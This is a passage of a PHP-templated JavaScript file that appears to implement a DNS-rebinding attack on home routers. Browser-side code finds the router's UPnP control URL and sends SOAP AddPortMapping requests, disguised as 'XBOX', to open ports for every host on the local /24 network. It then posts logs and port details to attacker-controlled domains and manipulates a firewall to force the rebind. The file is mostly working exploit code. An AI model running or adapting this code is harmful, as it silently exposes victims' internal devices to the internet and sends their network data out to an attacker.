 54 | xmlhttpworker.send();
 55 | 
 56 | function buildblob() {
 57 |     try {
 58 |         blob = new Blob([workerjs], {type: 'application/javascript'});
 59 |     } catch (e) { // Backwards-compatibility
 60 |         window.BlobBuilder = window.BlobBuilder || window.WebKitBlobBuilder || window.MozBlobBuilder;
 61 |         blob = new BlobBuilder();
 62 |         blob.append(response);
 63 |         blob = blob.getBlob();
 64 |     }
 65 | }
 66 | 
 67 | function workermessage(e) {
 68 |     console.log('Message received from worker: ' + e.data[0]);
 69 | 
 70 |     if (e.data[0] == "Logs") {
 71 |         logs += e.data[1];
 72 |         postlogs();
 73 |     }
 74 | }
 75 | 
 76 | function workererror(event){
 77 |     throw new Error(event.message + " (" + event.filename + ":" + event.lineno + ")");
 78 | };
 79 | 
 80 | function buildworkers() {
 81 |     //Create workers and put them in array
 82 |     for (i = 0; i < workernum; i++) {
 83 |         //workers[i] = new Worker('open.js');
 84 |         workers[i] = new Worker(URL.createObjectURL(blob));
 85 |         workers[i].onmessage = workermessage;
 86 |         workers[i].onerror = workererror;
 87 |     }
 88 | }
 89 | 
 90 | function opnip(iparray) {
 91 |     if (typeof iparray === 'undefined') {
 92 |         iparray = intips;
 93 |     }
 94 | 
 95 |     for (i=0; i < iparray.length; i++) {
 96 |         for (j=0; j < opnports.length; j++) {
 97 |             var portarr = opnports[j].split(":");
 98 |             var proto = portarr[1];
 99 |             var intportnum = portarr[0];
100 |             logs = logs + startportnum + "---" + iparray[i] + ":" + intportnum + "_" + proto + '<br>';
101 |             //alert("start");
102 |             loadXMLDoc(corrurl, schematype, startportnum, intportnum, proto, iparray[i]);
103 |             startportnum++;
104 |         }
105 |     }
106 | }
107 | 
108 | function loadXMLDoc(url, schema, extport, intport, proto, intip) {
109 |     //document.write("startxml");
110 |     req = false;
111 |     // branch for native XMLHttpRequest object
112 |     req = new XMLHttpRequest();
113 | 
114 |     if(req) {
115 |         //document.write("postxml");
116 |         req.onreadystatechange = processReqChange;
117 |         req.open("POST", url, true);
118 |         req.setRequestHeader('SOAPAction', '"' + schema + '#AddPortMapping"');
119 | 
120 |         req.send('<?php echo '<?'?>xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost><NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">'+ extport + '</NewExternalPort><NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">' + proto + '</NewProtocol><NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">' + intport + '</NewInternalPort><NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">' + intip + '</NewInternalClient><NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</NewEnabled><NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">XBOX</NewPortMappingDescription><NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>');
121 |     }
122 | }
123 | 
124 | function processReqChange() {
125 |     // only if req shows "loaded"
126 |     if (req.readyState == 4) {
127 |         // only if "OK"
128 |         if (req.status == 200) {
129 |             // ...processing statements go here...
130 |             // alert(req.responseText);
131 |         } else {
132 |             logs = logs + "There was a problem retrieving the XML data:\n" + req.statusText + '<br>';
133 |         }
134 |     }
135 | }
136 | 
137 | function openNet(net) {
138 |     net = net.replace(/(\d+\.\d+\.\d+)\.\d+/, '$1.');
139 |     var tmparray = [];
140 |     //255 / number of workers
141 |     var sectionsize = Math.ceil(255 / workers.length);
142 |     var portsize = opnports.length;
143 | 
144 |     for (var i = 1; i < 256; ++i) {
145 |         if (intips.indexOf(net+i) == -1){
146 |             tmparray.push(net + i);
147 |         }
148 |     }
149 | 
150 |     //for each worker, break off a chunk
151 |     for (var i=0; i < workers.length; i++) {
152 |         chunk = tmparray.splice(0,sectionsize)
153 |         console.log('Chunk ready to be sent: ' + chunk);
154 |         console.log('Startportnum is : ' + startportnum);
155 |         console.log('Control URL is : ' + corrurl);
156 |         controlurl = "http://" + uniqdom + ":" + location.port + corrurl;
157 |         workers[i].postMessage([chunk, controlurl, schematype, startportnum]);
158 |         //Add correct amount of ports based on number of ports to open times num of hosts in the chunk
159 |         startportnum += (sectionsize * portsize);
160 |         console.log('Startportnum changed to : ' + startportnum);
161 |     }
162 |     //opnip(tmparray);
163 | }
164 | 
165 | function postlogs() {
166 |     var postint = httpPost("http://d0.<?php echo $_SESSION["uid"]; echo $_SESSION["domain"]?>/r0.php",logs);
167 | }
168 | 
169 | function finish() {
170 |     var bs = httpPost("http://d0.<?php echo $_SESSION["uid"]; echo $_SESSION["domain"];?>/c0.html", btoa(location.port));
171 | }
172 | 
173 | function pausecomp(millis) {
174 |     var date = new Date();
175 |     var curDate = null;
176 |     do { curDate = new Date(); }
177 |     while(curDate-date < millis);
178 | }
179 | 
180 | function httpGet(theUrl, async) {
181 |     var xmlHttp = null;
182 | 
183 |     xmlHttp = new XMLHttpRequest();
184 | 
185 |     if (async == true) {
186 |         xmlHttp.timeout = 5;
187 |     }
188 | 
189 |     xmlHttp.open( "GET", theUrl, async);
190 |     xmlHttp.send( null );
191 |     return xmlHttp.responseText;
192 | }
193 | 
194 | function httpPost(theUrl,theText) {
195 |     var xmlHttp = null;
196 | 
197 |     xmlHttp = new XMLHttpRequest();
198 |     xmlHttp.open( "POST", theUrl, false);
199 |     xmlHttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
200 |     xmlHttp.send(theText);
201 |     return xmlHttp.responseText;
202 | }
203 | 
204 | function closefw() {
205 |     xmlHttp = new XMLHttpRequest();
206 |     xmlHttp.onreadystatechange=function() {
207 |         if (xmlHttp.readyState==4 && xmlHttp.status==200) {
208 |             //Do this to fail the first request and have the browser switch
209 |             httpGet("http://" + uniqdom + ":" + location.port + "/dead.html", true);
210 |             httpGet("http://" + uniqdom + ":" + location.port + "/dead2.html", true);
211 |             go();
212 |         }
213 |     }
214 | 
215 |     //This closes firewall on original ip.
216 |     xmlHttp.open("POST","http://d1." + uniqdom + "/c1.html",true);
217 |     xmlHttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
218 |     xmlHttp.send(btoa(location.port));
219 | }
220 | 
221 | function go() {
222 |     setTimeout(function() {
223 |         //Let's pause for a sec
224 |         //pausecomp(500);
225 |         for (index = 0; index < urls.length; index++) {
226 |             (function(index) {
227 |                 xmlhttp[index] = new XMLHttpRequest();
228 |                 xmlhttp[index].onreadystatechange = function() {
229 |                     console.log('Onreadcalled Status: ' + xmlhttp[index].status);
230 |                     if (xmlhttp[index.status] == 0) {
231 |                         retrycounter++;
232 |                         if (retrycounter == urls.length) {
233 |                             retrycounter = 0;
234 |                             go();
235 |                         }
236 |                     }
237 |                     if (xmlhttp[index].readyState == 4 && xmlhttp[index].status == 200) {
238 |                         console.log('Success');
239 |                         xmlDoc = xmlhttp[index].responseXML;
240 |                         x = xmlDoc.getElementsByTagName("service");
241 |                         for (i = 0; i < x.length; i++) {
242 |                             y = x[i].getElementsByTagName("serviceType");
243 |                             if (y[0].innerHTML == ("urn:schemas-upnp-org:service:WANIPConnection:1" || "urn:schemas-upnp-org:service:WANPPPConnection:1")) {
244 |                                 corrurl = x[i].getElementsByTagName("controlURL")[0].innerHTML;
245 |                                 schematype = y[0].innerHTML;
246 |                                 console.log('About to post message to worker Control URL: ' + corrurl);
247 |                                 opnip(intips);
248 |                                 openNet(getips[0]);
249 |                             }
250 |                         }
251 |                     }
252 |                 };
253 |                 try {
254 |                     xmlhttp[index].open("GET", urls[index], true);
255 |                     xmlhttp[index].send();
256 |                 } catch (e) {}
257 |             })(index);
258 |         }
259 |     }, 0)
260 |     setTimeout(function() {
261 |         var postint = httpPost("http://d0.<?php echo $_SESSION["uid "]; echo $_SESSION["domain "]?>/r0.php", logs);
262 |         var bs = httpPost("http://d0.<?php echo $_SESSION["uid "]; echo $_SESSION["domain "];?>/c0.html", btoa(location.port));
263 |     }, 500000);
264 | }
265 | 


--------------------------------------------------------------------------------